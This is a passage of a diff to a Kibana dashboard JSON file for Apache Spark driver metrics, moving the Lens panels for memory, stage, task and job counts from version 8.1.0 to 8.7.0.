"9857a495-b7e6-4893-93e6-f16c050e0e41", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d59683b7-5f29-46b9-b01b-20b6aea422fe", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "d7cd2d50-503d-48cc-b9d1-77da873349ef": { + "columnOrder": [ + "f9bf9e21-aaa3-4948-9239-59ff6afb84d9", + "9401333e-571b-4999-9f50-405cad23cd1a" + ], + "columns": { + "9401333e-571b-4999-9f50-405cad23cd1a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Memory", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.memory.used" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "f9bf9e21-aaa3-4948-9239-59ff6afb84d9": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "interval": "auto", + "includeEmptyRows": true + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "9857a495-b7e6-4893-93e6-f16c050e0e41", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "gridData": { - "h": 17, - "i": "a3339a86-6f2b-4f1a-85b8-4619c417a110", - "w": 24, - "x": 0, - "y": 0 + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "d59683b7-5f29-46b9-b01b-20b6aea422fe", + "key": "apache_spark.driver.memory.used", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.driver.memory.used" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "curveType": "LINEAR", + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "panelIndex": "a3339a86-6f2b-4f1a-85b8-4619c417a110", - "title": "Memory usage over time [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-37e4c96b-3ba5-4033-9727-fad41089931d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "8198873e-cf0a-43cf-8cd0-cd42a8df02c5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5df2fe94-f51b-44f9-b922-75663cb6996a", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "37e4c96b-3ba5-4033-9727-fad41089931d": { - "columnOrder": [ - "3c99f57f-933e-432c-8038-b95d81f3443f" - ], - "columns": { - "3c99f57f-933e-432c-8038-b95d81f3443f": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Number of Stages Completed", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.driver.stages.completed_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "8198873e-cf0a-43cf-8cd0-cd42a8df02c5", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "5df2fe94-f51b-44f9-b922-75663cb6996a", - "key": "apache_spark.driver.stages.completed_count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.stages.completed_count" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "3c99f57f-933e-432c-8038-b95d81f3443f", - "colorMode": "None", - "layerId": "37e4c96b-3ba5-4033-9727-fad41089931d", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "layers": [ + { + "accessors": [ + "9401333e-571b-4999-9f50-405cad23cd1a" + ], + "layerId": "d7cd2d50-503d-48cc-b9d1-77da873349ef", + "layerType": "data", + "position": "top", + "seriesType": "area_stacked", + "showGridlines": false, + "xAccessor": "f9bf9e21-aaa3-4948-9239-59ff6afb84d9", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "9401333e-571b-4999-9f50-405cad23cd1a" + } + ] + } + ], + "legend": { + "horizontalAlignment": "left", + "isInside": false, + "isVisible": true, + "position": "top", + "showSingleSeries": true, + "verticalAlignment": "top", + "legendSize": "auto" }, - "gridData": { - "h": 6, - "i": "2943002d-504e-4a30-a581-cd92fd621fe1", - "w": 8, - "x": 24, - "y": 0 + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "Timestamp", + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "2943002d-504e-4a30-a581-cd92fd621fe1", - "title": "Number of stages completed [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Memory" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-bb1faa77-fef6-486c-aaf9-ec1411bdad13", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "603b47e3-4608-4094-8826-f923eab506a8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "4a09ba27-dc93-43cf-be91-0632bc81cb47", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "bb1faa77-fef6-486c-aaf9-ec1411bdad13": { - "columnOrder": [ - "31520286-aa33-494c-8f42-412342c54e48" - ], - "columns": { - "31520286-aa33-494c-8f42-412342c54e48": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Number of Stages Skipped", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.driver.stages.skipped_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "603b47e3-4608-4094-8826-f923eab506a8", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "4a09ba27-dc93-43cf-be91-0632bc81cb47", - "key": "apache_spark.driver.stages.skipped_count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.stages.skipped_count" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "31520286-aa33-494c-8f42-412342c54e48", - "layerId": "bb1faa77-fef6-486c-aaf9-ec1411bdad13", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Memory usage over time [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "2943002d-504e-4a30-a581-cd92fd621fe1", + "w": 8, + "x": 24, + "y": 0 + }, + "panelIndex": "2943002d-504e-4a30-a581-cd92fd621fe1", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-37e4c96b-3ba5-4033-9727-fad41089931d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8198873e-cf0a-43cf-8cd0-cd42a8df02c5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "5df2fe94-f51b-44f9-b922-75663cb6996a", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "37e4c96b-3ba5-4033-9727-fad41089931d": { + "columnOrder": [ + "3c99f57f-933e-432c-8038-b95d81f3443f" + ], + "columns": { + "3c99f57f-933e-432c-8038-b95d81f3443f": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Number of Stages Completed", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.stages.completed_count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "8198873e-cf0a-43cf-8cd0-cd42a8df02c5", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "784e4a18-20e7-48ef-8737-3a8a4643c4fe", - "w": 8, - "x": 32, - "y": 0 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "panelIndex": "784e4a18-20e7-48ef-8737-3a8a4643c4fe", - "title": "Number of stages skipped [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "5df2fe94-f51b-44f9-b922-75663cb6996a", + "key": "apache_spark.driver.stages.completed_count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.driver.stages.completed_count" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "3c99f57f-933e-432c-8038-b95d81f3443f", + "colorMode": "None", + "layerId": "37e4c96b-3ba5-4033-9727-fad41089931d", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-6fc27bd4-9bc3-4233-9b1d-61df80582ad8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7e8d1def-772c-494c-b14e-eae96e52b074", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c5b629cf-0836-49ff-a409-23cb47735f02", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "6fc27bd4-9bc3-4233-9b1d-61df80582ad8": { - "columnOrder": [ - "cd6cf970-b884-4c72-94a1-0104f46eda4a" - ], - "columns": { - "cd6cf970-b884-4c72-94a1-0104f46eda4a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Number of Stages Failed", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.driver.stages.failed_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "7e8d1def-772c-494c-b14e-eae96e52b074", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "c5b629cf-0836-49ff-a409-23cb47735f02", - "key": "apache_spark.driver.stages.failed_count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.stages.failed_count" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "cd6cf970-b884-4c72-94a1-0104f46eda4a", - "layerId": "6fc27bd4-9bc3-4233-9b1d-61df80582ad8", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of stages completed [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "784e4a18-20e7-48ef-8737-3a8a4643c4fe", + "w": 8, + "x": 32, + "y": 0 + }, + "panelIndex": "784e4a18-20e7-48ef-8737-3a8a4643c4fe", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-bb1faa77-fef6-486c-aaf9-ec1411bdad13", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "603b47e3-4608-4094-8826-f923eab506a8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "4a09ba27-dc93-43cf-be91-0632bc81cb47", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "bb1faa77-fef6-486c-aaf9-ec1411bdad13": { + "columnOrder": [ + "31520286-aa33-494c-8f42-412342c54e48" + ], + "columns": { + "31520286-aa33-494c-8f42-412342c54e48": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Number of Stages Skipped", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.stages.skipped_count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "603b47e3-4608-4094-8826-f923eab506a8", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f", - "w": 8, - "x": 40, - "y": 0 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "panelIndex": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f", - "title": "Number of failed stages [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "4a09ba27-dc93-43cf-be91-0632bc81cb47", + "key": "apache_spark.driver.stages.skipped_count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.driver.stages.skipped_count" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "31520286-aa33-494c-8f42-412342c54e48", + "layerId": "bb1faa77-fef6-486c-aaf9-ec1411bdad13", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "787550e5-b4cd-4892-babc-4f3d33c078ec", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "df39527d-9339-47cb-9833-2e3d3ccc9c30": { - "columnOrder": [ - "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", - "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", - "16d7f486-58c7-46a1-96ea-d2be88b82633", - "02d81198-17ac-4861-870d-c481ba9a7dad" - ], - "columns": { - "02d81198-17ac-4861-870d-c481ba9a7dad": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Completed", - "operationType": "max", - "scale": "ratio", - "sourceField": "apache_spark.driver.tasks.completed" - }, - "16d7f486-58c7-46a1-96ea-d2be88b82633": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Skipped", - "operationType": "max", - "scale": "ratio", - "sourceField": "apache_spark.driver.tasks.skipped" - }, - "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Failed", - "operationType": "max", - "scale": "ratio", - "sourceField": "apache_spark.driver.tasks.failed" - }, - "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "787550e5-b4cd-4892-babc-4f3d33c078ec", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - } - ], - "query": { - "language": "kuery", - "query": "apache_spark.driver.tasks.failed : * or apache_spark.driver.tasks.skipped : * or apache_spark.driver.tasks.completed : * " - }, - "visualization": { - "fittingFunction": "Linear", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", - "16d7f486-58c7-46a1-96ea-d2be88b82633", - "02d81198-17ac-4861-870d-c481ba9a7dad" - ], - "layerId": "df39527d-9339-47cb-9833-2e3d3ccc9c30", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "xAccessor": "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", - "yConfig": [ - { - "axisMode": "left", - "color": "#d36086", - "forAccessor": "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a" - }, - { - "axisMode": "left", - "forAccessor": "16d7f486-58c7-46a1-96ea-d2be88b82633" - }, - { - "axisMode": "left", - "color": "#54b399", - "forAccessor": "02d81198-17ac-4861-870d-c481ba9a7dad" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "Timestamp", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Tasks" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of stages skipped [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f", + "w": 8, + "x": 40, + "y": 0 + }, + "panelIndex": "19bd059b-ca79-4fb0-b450-f8adeb8acc8f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6fc27bd4-9bc3-4233-9b1d-61df80582ad8", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7e8d1def-772c-494c-b14e-eae96e52b074", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c5b629cf-0836-49ff-a409-23cb47735f02", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "6fc27bd4-9bc3-4233-9b1d-61df80582ad8": { + "columnOrder": [ + "cd6cf970-b884-4c72-94a1-0104f46eda4a" + ], + "columns": { + "cd6cf970-b884-4c72-94a1-0104f46eda4a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Number of Stages Failed", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.stages.failed_count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "7e8d1def-772c-494c-b14e-eae96e52b074", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "f84a1cd9-1b4b-484e-87f7-953c2f645570", - "w": 24, - "x": 24, - "y": 6 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "panelIndex": "f84a1cd9-1b4b-484e-87f7-953c2f645570", - "title": "Number of Tasks over time [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "c5b629cf-0836-49ff-a409-23cb47735f02", + "key": "apache_spark.driver.stages.failed_count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.driver.stages.failed_count" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "cd6cf970-b884-4c72-94a1-0104f46eda4a", + "layerId": "6fc27bd4-9bc3-4233-9b1d-61df80582ad8", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-efa9fcdd-f421-4c27-a85b-3a6d2512a09d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b8679379-0bbe-4028-b3e7-2cc0f84fa045", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "97467acb-706a-4078-ae1a-ac6ab5fd47d7", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "efa9fcdd-f421-4c27-a85b-3a6d2512a09d": { - "columnOrder": [ - "6962059b-392d-416f-a321-b0de80b841a7" - ], - "columns": { - "6962059b-392d-416f-a321-b0de80b841a7": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Max Memory (MB)", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.driver.memory.max_mem" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "b8679379-0bbe-4028-b3e7-2cc0f84fa045", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "97467acb-706a-4078-ae1a-ac6ab5fd47d7", - "key": "apache_spark.driver.memory.max_mem", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.memory.max_mem" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "6962059b-392d-416f-a321-b0de80b841a7", - "layerId": "efa9fcdd-f421-4c27-a85b-3a6d2512a09d", - "layerType": "data" - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of failed stages [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 17, + "i": "f84a1cd9-1b4b-484e-87f7-953c2f645570", + "w": 24, + "x": 24, + "y": 6 + }, + "panelIndex": "f84a1cd9-1b4b-484e-87f7-953c2f645570", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "787550e5-b4cd-4892-babc-4f3d33c078ec", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "df39527d-9339-47cb-9833-2e3d3ccc9c30": { + "columnOrder": [ + "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", + "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", + "16d7f486-58c7-46a1-96ea-d2be88b82633", + "02d81198-17ac-4861-870d-c481ba9a7dad" + ], + "columns": { + "02d81198-17ac-4861-870d-c481ba9a7dad": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Completed", + "operationType": "max", + "scale": "ratio", + "sourceField": "apache_spark.driver.tasks.completed" + }, + "16d7f486-58c7-46a1-96ea-d2be88b82633": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Skipped", + "operationType": "max", + "scale": "ratio", + "sourceField": "apache_spark.driver.tasks.skipped" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Failed", + "operationType": "max", + "scale": "ratio", + "sourceField": "apache_spark.driver.tasks.failed" + }, + "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "interval": "auto", + "includeEmptyRows": true + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "787550e5-b4cd-4892-babc-4f3d33c078ec", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" }, - "enhancements": {}, - "hidePanelTitles": true + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } + } + ], + "query": { + "language": "kuery", + "query": "apache_spark.driver.tasks.failed : * or apache_spark.driver.tasks.skipped : * or apache_spark.driver.tasks.completed : * " + }, + "visualization": { + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", + "16d7f486-58c7-46a1-96ea-d2be88b82633", + "02d81198-17ac-4861-870d-c481ba9a7dad" + ], + "layerId": "df39527d-9339-47cb-9833-2e3d3ccc9c30", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "xAccessor": "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", + "yConfig": [ + { + "axisMode": "left", + "color": "#d36086", + "forAccessor": "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a" + }, + { + "axisMode": "left", + "forAccessor": "16d7f486-58c7-46a1-96ea-d2be88b82633" + }, + { + "axisMode": "left", + "color": "#54b399", + "forAccessor": "02d81198-17ac-4861-870d-c481ba9a7dad" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true, + "legendSize": "auto" }, - "gridData": { - "h": 6, - "i": "64cbf207-795a-4818-915c-137eaebc6198", - "w": 8, - "x": 0, - "y": 17 + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "Timestamp", + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "64cbf207-795a-4818-915c-137eaebc6198", - "title": "Maximum amount of memory available for storage [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Tasks" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-483b85ff-1b76-41d9-926b-25f70122ef28", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "509e9888-4307-45b6-9c04-5b7feafeef87", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "df5be9fa-fb96-4da2-a042-71b37b7c3275", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "483b85ff-1b76-41d9-926b-25f70122ef28": { - "columnOrder": [ - "6ecaa697-7840-4a3c-a949-687d66bd9cdd" - ], - "columns": { - "6ecaa697-7840-4a3c-a949-687d66bd9cdd": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Failed Jobs", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.driver.jobs.failed" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "509e9888-4307-45b6-9c04-5b7feafeef87", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "df5be9fa-fb96-4da2-a042-71b37b7c3275", - "key": "apache_spark.driver.jobs.failed", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.jobs.failed" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "6ecaa697-7840-4a3c-a949-687d66bd9cdd", - "layerId": "483b85ff-1b76-41d9-926b-25f70122ef28", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": 